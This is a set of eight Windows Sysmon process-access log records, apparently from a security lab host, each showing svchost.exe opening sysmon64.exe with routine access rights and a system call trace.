{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
